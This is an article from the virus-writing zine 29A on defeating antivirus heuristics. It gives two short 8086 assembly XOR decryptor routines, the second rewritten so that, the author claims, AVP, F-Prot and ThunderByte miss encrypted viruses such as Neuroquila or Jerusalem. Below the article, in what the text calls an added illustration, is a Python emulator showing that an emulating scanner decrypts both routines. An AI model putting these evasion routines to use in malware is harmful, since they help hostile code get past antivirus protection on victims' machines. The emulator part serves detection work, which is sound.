29A Issue 01 03 02

Published in 29A

Antiheuristics
───────────────────────────────────────────────────────────────────────>
AVV

We're used to the newest antiviruses promising total protection against
unknown viruses with what they call heuristics. And though it is an
important weapon against viruses, it isn't as safe as they assure. We
won't explain what heuristics are (it is just looking for several
instructions common to all viruses, which will show their presence).
Nevertheless, if we hide these instructions, the antivirus won't detect
anything and will happily say there's no danger when checking a modified
version of Neuroquila, Tremor, Zhengxi, etc., which will be encrypted
for these AVs.

The technique is easy. We just have to use a simple encryption routine
which the antivirus won't notice. AVP, F-Prot and ThunderByte recognize
several encryption routines. Now, the following routine decrypts
previously encrypted code:


        lea     di,enc_start            ; es:di -> first encrypted byte
        mov     cx,enc_size             ; cx has code's length
loop1:  mov     al,byte ptr es:[di]     ; fetch a byte
        xor     al,0cfh                 ; we'll simply xor each byte
        stosb                           ; and store it back (es:[di], di++)
        loop    loop1


This routine is easily caught by an antivirus, which will then discover
the hidden virus. But let's change the routine slightly:


        lea     di,enc_start            ; es:di -> first encrypted byte
        mov     si,di                   ; ds:si -> the same byte (ds = es assumed)
        mov     cx,enc_size             ; cx has code's length
        mov     dh,0cfh                 ; key held in a register, not an immediate
loop1:  xor     byte ptr es:[di],dh     ; decrypt the byte in place
        movsb                           ; copy ds:[si] to es:[di], si++, di++
        loop    loop1


This routine does exactly the same, but isn't caught by the heuristic
scan of any antivirus, so no crappy AV will decrypt anything, and our
virus won't be detected... :) If the programmer is careful not to use
any garbage code, all the AVs will fail to detect any virus, no matter
how famous it is... even Jerusalem! :) This demonstrates that heuristics
are not as safe as they appear to be.
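As an added illustration (Python, not code from the article or from 29A), here is a minimal emulator for the handful of 8086 instructions the two routines use, run over a constructed XOR-encrypted buffer. From the detection side this is the point: a scanner that emulates a suspected decryptor, instead of pattern-matching its instruction sequence, recovers the same plaintext from both forms and is not fooled by rewriting the loop. It assumes ds = es, i.e. one flat buffer, as in a COM host.

```python
# Added example, not code from the 29A article: a minimal emulator for the
# few 8086 instructions the two decryptors use.  It assumes ds == es (one
# flat buffer), so es:[di] and ds:[si] address the same bytes, as in a COM host.
KEY, PLAINTEXT, ENC_START = 0xCF, b"hello, 29A", 0x100   # constructed sample
MEMORY = bytearray(0x200)
MEMORY[ENC_START:ENC_START + len(PLAINTEXT)] = bytes(b ^ KEY for b in PLAINTEXT)

# The article's two routines as (mnemonic, operands...) tuples.
ROUTINE_1 = [("lea", "di", ENC_START), ("mov", "cx", len(PLAINTEXT)),
             ("label", "loop1"), ("mov", "al", "[di]"), ("xor", "al", KEY),
             ("stosb",), ("loop", "loop1")]
ROUTINE_2 = [("lea", "di", ENC_START), ("mov", "si", "di"),
             ("mov", "cx", len(PLAINTEXT)), ("mov", "dh", KEY),
             ("label", "loop1"), ("xor", "[di]", "dh"), ("movsb",),
             ("loop", "loop1")]

def emulate(routine, memory, max_steps=10_000):
    """Execute routine over a copy of memory and return the final bytes.
    max_steps bounds the run, as a scanner must when emulating unknown code."""
    mem = bytearray(memory)
    regs = {"di": 0, "si": 0, "cx": 0, "al": 0, "dh": 0}
    labels = {op[1]: i for i, op in enumerate(routine) if op[0] == "label"}
    def get(x):                               # register, [di] or immediate
        return mem[regs["di"]] if x == "[di]" else (regs[x] if isinstance(x, str) else x)
    def put(x, v):                            # register or [di], masked to width
        if x == "[di]":
            mem[regs["di"]] = v & 0xFF
        else:
            regs[x] = v & (0xFF if x in ("al", "dh") else 0xFFFF)

    pc = steps = 0
    while pc < len(routine) and steps < max_steps:
        op, *args = routine[pc]
        pc, steps = pc + 1, steps + 1
        if op in ("lea", "mov"):
            put(args[0], get(args[1]))
        elif op == "xor":
            put(args[0], get(args[0]) ^ get(args[1]))
        elif op == "stosb":                   # es:[di] = al; di += 1
            put("[di]", regs["al"]); regs["di"] += 1
        elif op == "movsb":                   # es:[di] = ds:[si]; si, di += 1
            put("[di]", mem[regs["si"]]); regs["si"] += 1; regs["di"] += 1
        elif op == "loop":                    # cx -= 1; jump while cx != 0
            regs["cx"] -= 1
            if regs["cx"]:
                pc = labels[args[0]]
    return bytes(mem)

def decrypted_region(routine):
    return emulate(routine, MEMORY)[ENC_START:ENC_START + len(PLAINTEXT)]
```

Both `decrypted_region(ROUTINE_1)` and `decrypted_region(ROUTINE_2)` return the constructed plaintext, so the two decryptors are indistinguishable to an emulating scanner even though only the first matches a fixed instruction pattern.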


Greets,
AVV.
